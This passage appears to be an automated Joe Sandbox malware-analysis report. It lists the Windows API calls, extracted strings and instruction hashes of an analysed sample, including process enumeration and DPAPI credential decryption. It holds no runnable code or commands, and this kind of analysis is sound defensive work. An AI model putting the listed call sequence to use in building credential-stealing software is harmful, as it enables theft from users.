                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                      • String ID:
                                      • API String ID: 2609814428-0
                                      APIs
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00A497AE
                                      • Process32First.KERNEL32(00A50ACE,00000128), ref: 00A497C2
                                      • Process32Next.KERNEL32(00A50ACE,00000128), ref: 00A497D7
                                      • StrCmpCA.SHLWAPI(?,00000000), ref: 00A497EC
                                      • CloseHandle.KERNEL32(00A50ACE), ref: 00A4980A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                      • String ID:
                                      • API String ID: 420147892-0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: <7\h$huzx
                                      • API String ID: 0-2989614873
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: iw_$<m7D$2m$s|g
                                      • API String ID: 0-843695166
                                      APIs
                                      • CryptBinaryToStringA.CRYPT32(00000000,00A351D4,40000001,00000000,00000000,?,00A351D4), ref: 00A49050
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: BinaryCryptString
                                      • String ID:
                                      • API String ID: 80407269-0
                                      APIs
                                      • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00A34F3E,00000000,00000000), ref: 00A3A23F
                                      • LocalAlloc.KERNEL32(00000040,?,?,?,00A34F3E,00000000,?), ref: 00A3A251
                                      • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00A34F3E,00000000,00000000), ref: 00A3A27A
                                      • LocalFree.KERNEL32(?,?,?,?,00A34F3E,00000000,?), ref: 00A3A28F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: BinaryCryptLocalString$AllocFree
                                      • String ID:
                                      • API String ID: 4291131564-0
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0131E880,00000000,?,00A50DF8,00000000,?,00000000,00000000), ref: 00A47BF3
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00A47BFA
                                      • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0131E880,00000000,?,00A50DF8,00000000,?,00000000,00000000,?), ref: 00A47C0D
                                      • wsprintfA.USER32 ref: 00A47C47
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                      • String ID:
                                      • API String ID: 3317088062-0
                                      APIs
                                      • CoCreateInstance.COMBASE(00A4E120,00000000,00000001,00A4E110,00000000), ref: 00A439A8
                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00A43A00
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ByteCharCreateInstanceMultiWide
                                      • String ID:
                                      • API String ID: 123533781-0
                                      APIs
                                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00A3A2D4
                                      • LocalAlloc.KERNEL32(00000040,00000000), ref: 00A3A2F3
                                      • LocalFree.KERNEL32(?), ref: 00A3A323
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Local$AllocCryptDataFreeUnprotect
                                      • String ID:
                                      • API String ID: 2068576380-0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: ?$__ZN
                                      • API String ID: 0-1427190319
                                      • Opcode ID: 5979ebcfade6a94da10809392b5ca83137eebb76b9c6aa0d0269130114abb242
                                      • Instruction ID: 26ac70756b7611844763f41f8e5fb977585b27b80543309504b974d51d119354
                                      • Opcode Fuzzy Hash: 5979ebcfade6a94da10809392b5ca83137eebb76b9c6aa0d0269130114abb242
                                      • Instruction Fuzzy Hash: CB720272E08B509FD714CF24C89067EB7E2AFDA320F598A1DF8A55B2D1D3709C419B85
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: A}
                                      • API String ID: 0-1240962006
                                      • Opcode ID: 2b5905b6748ed5dbd45a2d5499ac63f74f67f0f3adcb89961dc43e86f78387da
                                      • Instruction ID: 8dd367f7193c8b9d865d74fe0f77694276cd3c7358d32e25f596ee651cb53ff7
                                      • Opcode Fuzzy Hash: 2b5905b6748ed5dbd45a2d5499ac63f74f67f0f3adcb89961dc43e86f78387da
                                      • Instruction Fuzzy Hash: 7CB2E7F390C2149FE304AE2DEC8567AFBE9EF94720F1A452DEAC4C3744EA7558018697
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: !k=$R{}
                                      • API String ID: 0-3998711817
                                      • Opcode ID: 7922f2f839e2b0fba69b1ae9be3fa535e30216d33490c38ae16d4581074ae238
                                      • Instruction ID: 75f0d5b32aa41ea2f6ef2db92cb38a82998541cfbc9bccfb404d90c13b9cdd94
                                      • Opcode Fuzzy Hash: 7922f2f839e2b0fba69b1ae9be3fa535e30216d33490c38ae16d4581074ae238
                                      • Instruction Fuzzy Hash: 90715AF3E087046FE3446A2CDD8576AB7D5EB94320F2A863EDE88C3B44F979580142D6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: xn--
                                      • API String ID: 0-2826155999
                                      • Opcode ID: 2b343989945c8db34948502af16621292e4638c2f2d4a46b7c87ad31944dd077
                                      • Instruction ID: 5dfbbf3b744bdbdc987b3f8f3e0ab5608d5bf523fced1f8001428e0771e20d71
                                      • Opcode Fuzzy Hash: 2b343989945c8db34948502af16621292e4638c2f2d4a46b7c87ad31944dd077
                                      • Instruction Fuzzy Hash: 63A225B1C002688BFF28EB68C8947EDBBB1FF45340F1842AAD5567B281D7359E85CB51
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: __aulldiv
                                      • String ID:
                                      • API String ID: 3732870572-0
                                      • Opcode ID: c14b47d2e213c3a0e8374cf111387a659401d06af651524ed7eee9bee9842815
                                      • Instruction ID: acb3aa53fc112478a438de82c53eb6fb775684d38d505aed3c872929d85bbed4
                                      • Opcode Fuzzy Hash: c14b47d2e213c3a0e8374cf111387a659401d06af651524ed7eee9bee9842815
                                      • Instruction Fuzzy Hash: 2DE1F431A087419FC725EF28C8807AEB7E2EFC9300F554A2DE9D997291DB319C55CB82
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: __aulldiv
                                      • String ID:
                                      • API String ID: 3732870572-0
                                      • Opcode ID: 83317d89dfdf25b5cbfc261f48c526b848a7f8a57d589ef9335097789b789f81
                                      • Instruction ID: 0554a44efaa0afe67d04eba0c3ed524e271ea0ebc716b6bc31a9aad44c0dd7c5
                                      • Opcode Fuzzy Hash: 83317d89dfdf25b5cbfc261f48c526b848a7f8a57d589ef9335097789b789f81
                                      • Instruction Fuzzy Hash: 1FE1C431A083129FDB24EF18C8817AEB7E6EFC9310F15892DE9999B251D730EC45CB46
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: Ya
                                      • API String ID: 0-1372971626
                                      • Opcode ID: 929f2e49d5e92b53f59b01740005dfa526eac6843fdcf80a95e476f0193c9449
                                      • Instruction ID: 223bf12eac5b0d12a02c00b0677f2a10ee93385ff1eca00a181ca2fed1caaa10
                                      • Opcode Fuzzy Hash: 929f2e49d5e92b53f59b01740005dfa526eac6843fdcf80a95e476f0193c9449
                                      • Instruction Fuzzy Hash: 61F129F3A0C3049FE704AE69EC8577ABBD9EF94220F16492DE6C4C7744FA3598018697
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: UNC\
                                      • API String ID: 0-505053535
                                      • Opcode ID: f944912daca86eef5da2b02659a6c861781d9d5d66b239bded02d895f8a825b7
                                      • Instruction ID: 0f54ba5c8ddd9bbcecf86194c045ac4b2b69114a57b5187a197e265fd2056080
                                      • Opcode Fuzzy Hash: f944912daca86eef5da2b02659a6c861781d9d5d66b239bded02d895f8a825b7
                                      • Instruction Fuzzy Hash: F2E11971F046658EEF10CF19C8843BEBBF2AB85318F198169D4A46F293D7768D46CB90
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: "_
                                      • API String ID: 0-1106872946
                                      • Opcode ID: 9f2f31fd9fc952638194ae73c465c8b427c12fcc3fe2269d33ed7e6ef11e1154
                                      • Instruction ID: f7cace3b45d76d18e6f99bc2266acf50151cb82c1b7a4b8305c2b0c2196cce5d
                                      • Opcode Fuzzy Hash: 9f2f31fd9fc952638194ae73c465c8b427c12fcc3fe2269d33ed7e6ef11e1154
                                      • Instruction Fuzzy Hash: 985167F3A082044BF3082A39DC997BA76C6DBD0320F1B473DD79A97BC4ED3958058286
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                       • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1e3986901fc0f1a4319e7d01457ad1d0812182087c947abc2d72d01c15065298
                                      • Instruction ID: d9b499c11be97413dbbbbe6138e343149c44219a83974d569b2244265909f2be
                                      • Opcode Fuzzy Hash: 1e3986901fc0f1a4319e7d01457ad1d0812182087c947abc2d72d01c15065298
                                      • Instruction Fuzzy Hash: 4382E1B5A00F448FD765CF29C880B92B7F1BF5A300F548A2ED9EA9B651DB30B549CB50
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                       • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmp
